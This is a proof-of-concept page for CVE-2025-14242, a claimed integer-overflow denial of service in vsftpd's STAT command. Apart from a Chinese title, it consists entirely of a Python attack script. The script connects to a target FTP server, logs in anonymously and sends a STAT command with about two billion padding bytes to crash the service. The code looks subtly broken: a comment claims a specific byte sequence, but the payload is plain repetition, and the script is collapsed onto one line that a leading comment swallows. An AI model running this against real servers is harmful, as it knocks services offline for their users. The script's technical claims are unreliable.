CVE-2025-14242: vsftpd STAT命令整数溢出导致拒绝服务漏洞

#!/usr/bin/env python3 # CVE-2025-14242 PoC - vsftpd STAT Command Integer Overflow DoS # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import socket import sys def exploit_vsftpd(target_ip, target_port=21): """ Exploit integer overflow in vsftpd STAT command parameter parsing This causes a denial of service by crashing the vsftpd process """ try: # Connect to FTP server sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # Receive banner banner = sock.recv(1024) print(f"[+] Received banner: {banner.decode().strip()}") # Login with low-privilege user sock.send(b"USER anonymous\r\n") resp = sock.recv(1024) print(f"[+] User response: {resp.decode().strip()}") sock.send(b"PASS anonymous\r\n") resp = sock.recv(1024) print(f"[+] Pass response: {resp.decode().strip()}") # Send crafted STAT command with overflow-triggering parameter # The specific byte sequence triggers integer overflow in ls parsing malicious_payload = b"STAT " + b"A" * 2147483647 + b"\r\n" print(f"[+] Sending malicious STAT command...") sock.send(malicious_payload) # Wait for response or timeout try: resp = sock.recv(1024) print(f"[+] Response: {resp.decode().strip()}") except socket.timeout: print("[*] No response received - service may be crashed") sock.close() return True except socket.error as e: print(f"[-] Socket error: {e}") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 21 print(f"[*] Targeting {target}:{port}") exploit_vsftpd(target, port)